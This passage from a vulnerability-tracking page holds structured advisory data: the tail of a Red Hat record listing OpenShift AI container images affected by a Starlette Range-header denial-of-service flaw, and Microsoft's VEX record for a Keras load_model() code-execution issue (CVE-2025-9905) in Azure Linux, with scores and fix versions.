"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette DoS via Range header merging"
}
]
}
MSRC_CVE-2025-9905
Vulnerability from csaf_microsoft - Published: 2025-09-02 00:00 - Updated: 2025-09-20 01:03Summary
Arbitary Code execution in Keras load_model()
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9905 Arbitary Code execution in Keras load_model() - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-9905.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Arbitary Code execution in Keras load_model()",
"tracking": {
"current_release_date": "2025-09-20T01:03:44.000Z",
"generator": {
"date": "2025-10-20T03:48:57.169Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-9905",
"initial_release_date": "2025-09-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-20T01:03:44.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 keras 3.3.3-3",
"product": {
"name": "\u003cazl3 keras 3.3.3-3",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 keras 3.3.3-3",
"product": {
"name": "azl3 keras 3.3.3-3",
"product_id": "20434"
}
}
],
"category": "product_name",
"name": "keras"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 keras 3.3.3-3 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 keras 3.3.3-3 as a component of Azure Linux 3.0",
"product_id": "20434-17084"
},
"product_reference": "20434",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9905",
"cwe": {
"id": "CWE-913",
"name": "Improper Control of Dynamically-Managed Code Resources"
},
"notes": [
{
"category": "general",
"text": "Google",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20434-17084"
],
"known_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9905 Arbitary Code execution in Keras load_model() - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-9905.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2025-09-20T01:03:44.000Z",
"details": "3.3.3-4:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"environmentalsScore": 0.0,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 7.3,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"17084-1"
]
}
],
"title": "Arbitary Code execution in Keras load_model()"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…